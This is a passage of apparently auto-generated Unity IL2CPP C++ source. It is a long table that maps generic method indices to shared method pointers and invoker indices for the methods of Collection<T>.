3421/*(Il2CppMethodPointer)&Collection_1_get_Count_m3868337800_gshared*/, 3/*3*/}, { 4171, 3422/*(Il2CppMethodPointer)&Collection_1_get_Item_m1044868508_gshared*/, 1251/*1251*/}, { 4172, 3423/*(Il2CppMethodPointer)&Collection_1_set_Item_m2199807215_gshared*/, 1253/*1253*/}, { 4173, 3424/*(Il2CppMethodPointer)&Collection_1_SetItem_m3822382874_gshared*/, 1253/*1253*/}, { 4174, 3425/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m1224378277_gshared*/, 1/*1*/}, { 4175, 3426/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m2972284337_gshared*/, 1595/*1595*/}, { 4176, 3427/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m691269733_gshared*/, 90/*90*/}, { 4177, 3428/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m901474669_gshared*/, 1/*1*/}, { 4178, 3429/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m1816795498_gshared*/, 1/*1*/}, { 4179, 3430/*(Il2CppMethodPointer)&Collection_1__ctor_m3209814810_gshared*/, 0/*0*/}, { 4180, 3431/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m833878573_gshared*/, 43/*43*/}, { 4181, 3432/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m2859266050_gshared*/, 86/*86*/}, { 4182, 3433/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m2656507741_gshared*/, 4/*4*/}, { 4183, 3434/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m1511844254_gshared*/, 5/*5*/}, { 4184, 3435/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m3210868188_gshared*/, 1/*1*/}, { 4185, 3436/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m4089922984_gshared*/, 5/*5*/}, { 4186, 3437/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m2389175113_gshared*/, 187/*187*/}, { 4187, 3438/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m2259205169_gshared*/, 90/*90*/}, { 4188, 3439/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m2454331058_gshared*/, 43/*43*/}, { 4189, 3440/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m1535537580_gshared*/, 4/*4*/}, { 4190, 3441/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m227446821_gshared*/, 43/*43*/}, { 4191, 3442/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m1820916678_gshared*/, 43/*43*/}, { 4192, 3443/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m1416875369_gshared*/, 97/*97*/}, { 4193, 3444/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m565207412_gshared*/, 187/*187*/}, { 4194, 3445/*(Il2CppMethodPointer)&Collection_1_Add_m269634181_gshared*/, 1063/*1063*/}, { 4195, 3446/*(Il2CppMethodPointer)&Collection_1_Clear_m2405574977_gshared*/, 0/*0*/}, { 4196, 3447/*(Il2CppMethodPointer)&Collection_1_ClearItems_m1280157591_gshared*/, 0/*0*/}, { 4197, 3448/*(Il2CppMethodPointer)&Collection_1_Contains_m1299140035_gshared*/, 1284/*1284*/}, { 4198, 3449/*(Il2CppMethodPointer)&Collection_1_CopyTo_m911594061_gshared*/, 86/*86*/}, { 4199, 3450/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m3801750330_gshared*/, 4/*4*/}, { 4200, 3451/*(Il2CppMethodPointer)&Collection_1_IndexOf_m2700825189_gshared*/, 1348/*1348*/}, { 4201, 3452/*(Il2CppMethodPointer)&Collection_1_Insert_m3143457948_gshared*/, 1430/*1430*/}, { 4202, 3453/*(Il2CppMethodPointer)&Collection_1_InsertItem_m2988595291_gshared*/, 1430/*1430*/}, { 4203, 3454/*(Il2CppMethodPointer)&Collection_1_Remove_m1361950154_gshared*/, 1284/*1284*/}, { 4204, 3455/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m3988604536_gshared*/, 42/*42*/}, { 4205, 3456/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m3987135770_gshared*/, 42/*42*/}, { 4206, 3457/*(Il2CppMethodPointer)&Collection_1_get_Count_m2275297230_gshared*/, 3/*3*/}, { 4207, 3458/*(Il2CppMethodPointer)&Collection_1_get_Item_m1415164804_gshared*/, 1216/*1216*/}, { 4208, 3459/*(Il2CppMethodPointer)&Collection_1_set_Item_m1822499517_gshared*/, 1430/*1430*/}, { 4209, 3460/*(Il2CppMethodPointer)&Collection_1_SetItem_m3922004788_gshared*/, 1430/*1430*/}, { 4210, 3461/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m429993695_gshared*/, 1/*1*/}, { 4211, 3462/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m3168406667_gshared*/, 1065/*1065*/}, { 4212, 3463/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m2744664947_gshared*/, 90/*90*/}, { 4213, 3464/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m3188913819_gshared*/, 1/*1*/}, { 4214, 3465/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m1962363848_gshared*/, 1/*1*/}, { 4215, 3466/*(Il2CppMethodPointer)&Collection_1__ctor_m2421771870_gshared*/, 0/*0*/}, { 4216, 3467/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m3440030017_gshared*/, 43/*43*/}, { 4217, 3468/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m2909922374_gshared*/, 86/*86*/}, { 4218, 3469/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m3927563793_gshared*/, 4/*4*/}, { 4219, 3470/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m2085691818_gshared*/, 5/*5*/}, { 4220, 3471/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m2973794400_gshared*/, 1/*1*/}, { 4221, 3472/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m3976312928_gshared*/, 5/*5*/}, { 4222, 3473/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m2968289909_gshared*/, 187/*187*/}, { 4223, 3474/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m1597250373_gshared*/, 90/*90*/}, { 4224, 3475/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m2440175782_gshared*/, 43/*43*/}, { 4225, 3476/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m3802141344_gshared*/, 4/*4*/}, { 4226, 3477/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m993584401_gshared*/, 43/*43*/}, { 4227, 3478/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m2857348178_gshared*/, 43/*43*/}, { 4228, 3479/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m444896877_gshared*/, 97/*97*/}, { 4229, 3480/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m3153658436_gshared*/, 187/*187*/}, { 4230, 3481/*(Il2CppMethodPointer)&Collection_1_Add_m1287729225_gshared*/, 1394/*1394*/}, { 4231, 3482/*(Il2CppMethodPointer)&Collection_1_Clear_m4277830205_gshared*/, 0/*0*/}, { 4232, 3483/*(Il2CppMethodPointer)&Collection_1_ClearItems_m3446813399_gshared*/, 0/*0*/}, { 4233, 3484/*(Il2CppMethodPointer)&Collection_1_Contains_m104325011_gshared*/, 1291/*1291*/}, { 4234, 3485/*(Il2CppMethodPointer)&Collection_1_CopyTo_m3960508929_gshared*/, 86/*86*/}, { 4235, 3486/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m1417525918_gshared*/, 4/*4*/}, { 4236, 3487/*(Il2CppMethodPointer)&Collection_1_IndexOf_m1939184889_gshared*/, 1356/*1356*/}, { 4237, 3488/*(Il2CppMethodPointer)&Collection_1_Insert_m3041550124_gshared*/, 1437/*1437*/}, { 4238, 3489/*(Il2CppMethodPointer)&Collection_1_InsertItem_m2646054899_gshared*/, 1437/*1437*/}, { 4239, 3490/*(Il2CppMethodPointer)&Collection_1_Remove_m1798559666_gshared*/, 1291/*1291*/}, { 4240, 3491/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m3454169520_gshared*/, 42/*42*/}, { 4241, 3492/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m2565709010_gshared*/, 42/*42*/}, { 4242, 3493/*(Il2CppMethodPointer)&Collection_1_get_Count_m3398138634_gshared*/, 3/*3*/}, { 4243, 3494/*(Il2CppMethodPointer)&Collection_1_get_Item_m853386420_gshared*/, 1500/*1500*/}, { 4244, 3495/*(Il2CppMethodPointer)&Collection_1_set_Item_m1223389833_gshared*/, 1437/*1437*/}, { 4245, 3496/*(Il2CppMethodPointer)&Collection_1_SetItem_m743789492_gshared*/, 1437/*1437*/}, { 4246, 3497/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m4107344143_gshared*/, 1/*1*/}, { 4247, 3498/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m49676267_gshared*/, 1598/*1598*/}, { 4248, 3499/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m1981549411_gshared*/, 90/*90*/}, { 4249, 3500/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m1020109595_gshared*/, 1/*1*/}, { 4250, 3501/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m218241296_gshared*/, 1/*1*/}, { 4251, 3502/*(Il2CppMethodPointer)&Collection_1__ctor_m2877526632_gshared*/, 0/*0*/}, { 4252, 3503/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m2310647315_gshared*/, 43/*43*/}, { 4253, 3504/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m3634566396_gshared*/, 86/*86*/}, { 4254, 3505/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m3501062047_gshared*/, 4/*4*/}, { 4255, 3506/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m2101501424_gshared*/, 5/*5*/}, { 4256, 3507/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m1897568526_gshared*/, 1/*1*/}, { 4257, 3508/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m1950953062_gshared*/, 5/*5*/}, { 4258, 3509/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m3259603871_gshared*/, 187/*187*/}, { 4259, 3510/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m1635106967_gshared*/, 90/*90*/}, { 4260, 3511/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m1552283608_gshared*/, 43/*43*/}, { 4261, 3512/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m1079933526_gshared*/, 4/*4*/}, { 4262, 3513/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m3946690039_gshared*/, 43/*43*/}, { 4263, 3514/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m98943364_gshared*/, 43/*43*/}, { 4264, 3515/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m4028692259_gshared*/, 97/*97*/}, { 4265, 3516/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m1304348310_gshared*/, 187/*187*/}, { 4266, 3517/*(Il2CppMethodPointer)&Collection_1_Add_m3912369843_gshared*/, 1395/*1395*/}, { 4267, 3518/*(Il2CppMethodPointer)&Collection_1_Clear_m445145071_gshared*/, 0/*0*/}, { 4268, 3519/*(Il2CppMethodPointer)&Collection_1_ClearItems_m4268731177_gshared*/, 0/*0*/}, { 4269, 3520/*(Il2CppMethodPointer)&Collection_1_Contains_m4154862785_gshared*/, 1292/*1292*/}, { 4270, 3521/*(Il2CppMethodPointer)&Collection_1_CopyTo_m2849468407_gshared*/, 86/*86*/}, { 4271, 3522/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m342981132_gshared*/, 4/*4*/}, { 4272, 3523/*(Il2CppMethodPointer)&Collection_1_IndexOf_m982392499_gshared*/, 1357/*1357*/}, { 4273, 3524/*(Il2CppMethodPointer)&Collection_1_Insert_m3109089306_gshared*/, 1438/*1438*/}, { 4274, 3525/*(Il2CppMethodPointer)&Collection_1_InsertItem_m1225429801_gshared*/, 1438/*1438*/}, { 4275, 3526/*(Il2CppMethodPointer)&Collection_1_Remove_m3602697996_gshared*/, 1292/*1292*/}, { 4276, 3527/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m2830794054_gshared*/, 42/*42*/}, { 4277, 3528/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m3509243296_gshared*/, 42/*42*/}, { 4278, 3529/*(Il2CppMethodPointer)&Collection_1_get_Count_m4080271760_gshared*/, 3/*3*/}, { 4279, 3530/*(Il2CppMethodPointer)&Collection_1_get_Item_m3041416970_gshared*/, 1501/*1501*/}, { 4280, 3531/*(Il2CppMethodPointer)&Collection_1_set_Item_m931801075_gshared*/, 1438/*1438*/}, { 4281, 3532/*(Il2CppMethodPointer)&Collection_1_SetItem_m3715941382_gshared*/, 1438/*1438*/}, { 4282, 3533/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m2164075061_gshared*/, 1/*1*/}, { 4283, 3534/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m3057301945_gshared*/, 1600/*1600*/}, { 4284, 3535/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m1820193045_gshared*/, 90/*90*/}, { 4285, 3536/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m1260165421_gshared*/, 1/*1*/}, { 4286, 3537/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m3428067414_gshared*/, 1/*1*/}, { 4287, 3538/*(Il2CppMethodPointer)&Collection_1__ctor_m824713192_gshared*/, 0/*0*/}, { 4288, 3539/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m258949859_gshared*/, 43/*43*/}, { 4289, 3540/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m1530034228_gshared*/, 86/*86*/}, { 4290, 3541/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m357926791_gshared*/, 4/*4*/}, { 4291, 3542/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m2091889616_gshared*/, 5/*5*/}, { 4292, 3543/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m3870109702_gshared*/, 1/*1*/}, { 4293, 3544/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m4103700798_gshared*/, 5/*5*/}, { 4294, 3545/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m1564892471_gshared*/, 187/*187*/}, { 4295, 3546/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m2275830295_gshared*/, 90/*90*/}, { 4296, 3547/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m4268731816_gshared*/, 43/*43*/}, { 4297, 3548/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m2157752542_gshared*/, 4/*4*/}, { 4298, 3549/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m2204750039_gshared*/, 43/*43*/}, { 4299, 3550/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m1235612188_gshared*/, 43/*43*/}, { 4300, 3551/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m2836259259_gshared*/, 97/*97*/}, { 4301, 3552/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m1144252646_gshared*/, 187/*187*/}, { 4302, 3553/*(Il2CppMethodPointer)&Collection_1_Add_m74004467_gshared*/, 1176/*1176*/}, { 4303, 3554/*(Il2CppMethodPointer)&Collection_1_Clear_m902663591_gshared*/, 0/*0*/}, { 4304, 3555/*(Il2CppMethodPointer)&Collection_1_ClearItems_m693003625_gshared*/, 0/*0*/}, { 4305, 3556/*(Il2CppMethodPointer)&Collection_1_Contains_m643401393_gshared*/, 1293/*1293*/}, { 4306, 3557/*(Il2CppMethodPointer)&Collection_1_CopyTo_m2830694815_gshared*/, 86/*86*/}, { 4307, 3558/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m2569672788_gshared*/, 4/*4*/}, { 4308, 3559/*(Il2CppMethodPointer)&Collection_1_IndexOf_m3343330387_gshared*/, 1358/*1358*/}, { 4309, 3560/*(Il2CppMethodPointer)&Collection_1_Insert_m4010554762_gshared*/, 1248/*1248*/}, { 4310, 3561/*(Il2CppMethodPointer)&Collection_1_InsertItem_m1073626529_gshared*/, 1248/*1248*/}, { 4311, 3562/*(Il2CppMethodPointer)&Collection_1_Remove_m2017992820_gshared*/, 1293/*1293*/}, { 4312, 3563/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m3860546430_gshared*/, 42/*42*/}, { 4313, 3564/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m1406181352_gshared*/, 42/*42*/}, { 4314, 3565/*(Il2CppMethodPointer)&Collection_1_get_Count_m804306016_gshared*/, 3/*3*/}, { 4315, 3566/*(Il2CppMethodPointer)&Collection_1_get_Item_m4215988522_gshared*/, 1247/*1247*/}, { 4316, 3567/*(Il2CppMethodPointer)&Collection_1_set_Item_m2966269643_gshared*/, 1248/*1248*/}, { 4317, 3568/*(Il2CppMethodPointer)&Collection_1_SetItem_m2707773254_gshared*/, 1248/*1248*/}, { 4318, 3569/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m1598831189_gshared*/, 1/*1*/}, { 4319, 3570/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m2563496281_gshared*/, 1602/*1602*/}, { 4320, 3571/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m3938993573_gshared*/, 90/*90*/}, { 4321, 3572/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m278383949_gshared*/, 1/*1*/}, { 4322, 3573/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m3675221982_gshared*/, 1/*1*/}, { 4323, 3574/*(Il2CppMethodPointer)&Collection_1__ctor_m280610349_gshared*/, 0/*0*/}, { 4324, 3575/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m332578650_gshared*/, 43/*43*/}, { 4325, 3576/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m2173992613_gshared*/, 86/*86*/}, { 4326, 3577/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m2964241726_gshared*/, 4/*4*/}, { 4327, 3578/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m1668787801_gshared*/, 5/*5*/}, { 4328, 3579/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m201332997_gshared*/, 1/*1*/}, { 4329, 3580/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m1845921895_gshared*/, 5/*5*/}, { 4330, 3581/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m1413704304_gshared*/, 187/*187*/}, { 4331, 3582/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m1300727994_gshared*/, 90/*90*/}, { 4332, 3583/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m1375670137_gshared*/, 43/*43*/}, { 4333, 3584/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m3954909253_gshared*/, 4/*4*/}, { 4334, 3585/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m645437336_gshared*/, 43/*43*/}, { 4335, 3586/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m4005091053_gshared*/, 43/*43*/}, { 4336, 3587/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m1122792492_gshared*/, 97/*97*/}, { 4337, 3588/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m1771213311_gshared*/, 187/*187*/}, { 4338, 3589/*(Il2CppMethodPointer)&Collection_1_Add_m3780991772_gshared*/, 810/*810*/}, { 4339, 3590/*(Il2CppMethodPointer)&Collection_1_Clear_m1781213416_gshared*/, 0/*0*/}, { 4340, 3591/*(Il2CppMethodPointer)&Collection_1_ClearItems_m4012342966_gshared*/, 0/*0*/}, { 4341, 3592/*(Il2CppMethodPointer)&Collection_1_Contains_m1999290510_gshared*/, 915/*915*/}, { 4342, 3593/*(Il2CppMethodPointer)&Collection_1_CopyTo_m2609841924_gshared*/, 86/*86*/}, { 4343, 3594/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m3988846785_gshared*/, 4/*4*/}, { 4344, 3595/*(Il2CppMethodPointer)&Collection_1_IndexOf_m3205002734_gshared*/, 1111/*1111*/}, { 4345, 3596/*(Il2CppMethodPointer)&Collection_1_Insert_m546633447_gshared*/, 854/*854*/}, { 4346, 3597/*(Il2CppMethodPointer)&Collection_1_InsertItem_m2280405802_gshared*/, 854/*854*/}, { 4347, 3598/*(Il2CppMethodPointer)&Collection_1_Remove_m2358120395_gshared*/, 915/*915*/}, { 4348, 3599/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m3837863139_gshared*/, 42/*42*/}, { 4349, 3600/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m4050404863_gshared*/, 42/*42*/}, { 4350, 3601/*(Il2CppMethodPointer)&Collection_1_get_Count_m2168572537_gshared*/, 3/*3*/}, { 4351, 3602/*(Il2CppMethodPointer)&Collection_1_get_Item_m3791221403_gshared*/, 1146/*1146*/}, { 4352, 3603/*(Il2CppMethodPointer)&Collection_1_set_Item_m3440986310_gshared*/, 854/*854*/}, { 4353, 3604/*(Il2CppMethodPointer)&Collection_1_SetItem_m546457615_gshared*/, 854/*854*/}, { 4354, 3605/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m1082009684_gshared*/, 1/*1*/}, { 4355, 3606/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m2559468638_gshared*/, 861/*861*/}, { 4356, 3607/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m732350052_gshared*/, 90/*90*/}, { 4357, 3608/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m1366278230_gshared*/, 1/*1*/}, { 4358, 3609/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m499196375_gshared*/, 1/*1*/}, { 4359, 3610/*(Il2CppMethodPointer)&Collection_1__ctor_m2803866674_gshared*/, 0/*0*/}, { 4360, 3611/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m673880345_gshared*/, 43/*43*/}, { 4361, 3612/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m1503676394_gshared*/, 86/*86*/}, { 4362, 3613/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m1452790461_gshared*/, 4/*4*/}, { 4363, 3614/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m640532794_gshared*/, 5/*5*/}, { 4364, 3615/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m2730731556_gshared*/, 1/*1*/}, { 4365, 3616/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m1461992904_gshared*/, 5/*5*/}, { 4366, 3617/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m1511106741_gshared*/, 187/*187*/}, { 4367, 3618/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m1898663061_gshared*/, 90/*90*/}, { 4368, 3619/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m3261717850_gshared*/, 43/*43*/}, { 4369, 3620/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m1145246314_gshared*/, 4/*4*/}, { 4370, 3621/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m3252091801_gshared*/, 43/*43*/}, { 4371, 3622/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m2316991470_gshared*/, 43/*43*/}, { 4372, 3623/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m287847793_gshared*/, 97/*97*/}, { 4373, 3624/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m3257045604_gshared*/, 187/*187*/}, { 4374, 3625/*(Il2CppMethodPointer)&Collection_1_Add_m476333057_gshared*/, 789/*789*/}, { 4375, 3626/*(Il2CppMethodPointer)&Collection_1_Clear_m1950842157_gshared*/, 0/*0*/}, { 4376, 3627/*(Il2CppMethodPointer)&Collection_1_ClearItems_m1649070779_gshared*/, 0/*0*/}, { 4377, 3628/*(Il2CppMethodPointer)&Collection_1_Contains_m1283318831_gshared*/, 916/*916*/}, { 4378, 3629/*(Il2CppMethodPointer)&Collection_1_CopyTo_m3463167433_gshared*/, 86/*86*/}, { 4379, 3630/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m3806968838_gshared*/, 4/*4*/}, { 4380, 3631/*(Il2CppMethodPointer)&Collection_1_IndexOf_m1982527469_gshared*/, 1360/*1360*/}, { 4381, 3632/*(Il2CppMethodPointer)&Collection_1_Insert_m4278832780_gshared*/, 1252/*1252*/}, { 4382, 3633/*(Il2CppMethodPointer)&Collection_1_InsertItem_m707141967_gshared*/, 1252/*1252*/}, { 4383, 3634/*(Il2CppMethodPointer)&Collection_1_Remove_m2859467914_gshared*/, 916/*916*/}, { 4384, 3635/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m2471647752_gshared*/, 42/*42*/}, { 4385, 3636/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m2272047354_gshared*/, 42/*42*/}, { 4386, 3637/*(Il2CppMethodPointer)&Collection_1_get_Count_m785673946_gshared*/, 3/*3*/}, { 4387, 3638/*(Il2CppMethodPointer)&Collection_1_get_Item_m794668022_gshared*/, 1250/*1250*/}, { 4388, 3639/*(Il2CppMethodPointer)&Collection_1_set_Item_m3169051009_gshared*/, 1252/*1252*/}, { 4389, 3640/*(Il2CppMethodPointer)&Collection_1_SetItem_m1360166612_gshared*/, 1252/*1252*/}, { 4390, 3641/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m404831699_gshared*/, 1/*1*/}, { 4391, 3642/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m246573059_gshared*/, 1605/*1605*/}, { 4392, 3643/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m3203250655_gshared*/, 90/*90*/}, { 4393, 3644/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m971497175_gshared*/, 1/*1*/}, { 4394, 3645/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m1280898648_gshared*/, 1/*1*/}, { 4395, 3646/*(Il2CppMethodPointer)&Collection_1__ctor_m1391736395_gshared*/, 0/*0*/}, { 4396, 3647/*(Il2CppMethodPointer)&Collection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m356644320_gshared*/, 43/*43*/}, { 4397, 3648/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_CopyTo_m4082149895_gshared*/, 86/*86*/}, { 4398, 3649/*(Il2CppMethodPointer)&Collection_1_System_Collections_IEnumerable_GetEnumerator_m4174600764_gshared*/, 4/*4*/}, { 4399, 3650/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Add_m2465313687_gshared*/, 5/*5*/}, { 4400, 3651/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Contains_m3229099071_gshared*/, 1/*1*/}, { 4401, 3652/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_IndexOf_m277631909_gshared*/, 5/*5*/}, { 4402, 3653/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Insert_m435904526_gshared*/, 187/*187*/}, { 4403, 3654/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_Remove_m2686870640_gshared*/, 90/*90*/}, { 4404, 3655/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_IsSynchronized_m2134448703_gshared*/, 43/*43*/}, { 4405, 3656/*(Il2CppMethodPointer)&Collection_1_System_Collections_ICollection_get_SyncRoot_m2871804519_gshared*/, 4/*4*/}, { 4406, 3657/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsFixedSize_m1382816922_gshared*/, 43/*43*/}, { 4407, 3658/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_IsReadOnly_m456424563_gshared*/, 43/*43*/}, { 4408, 3659/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_get_Item_m1995028750_gshared*/, 97/*97*/}, { 4409, 3660/*(Il2CppMethodPointer)&Collection_1_System_Collections_IList_set_Item_m1553863349_gshared*/, 187/*187*/}, { 4410, 3661/*(Il2CppMethodPointer)&Collection_1_Add_m813799802_gshared*/, 1255/*1255*/}, { 4411, 3662/*(Il2CppMethodPointer)&Collection_1_Clear_m2820045022_gshared*/, 0/*0*/}, { 4412, 3663/*(Il2CppMethodPointer)&Collection_1_ClearItems_m2476407724_gshared*/, 0/*0*/}, { 4413, 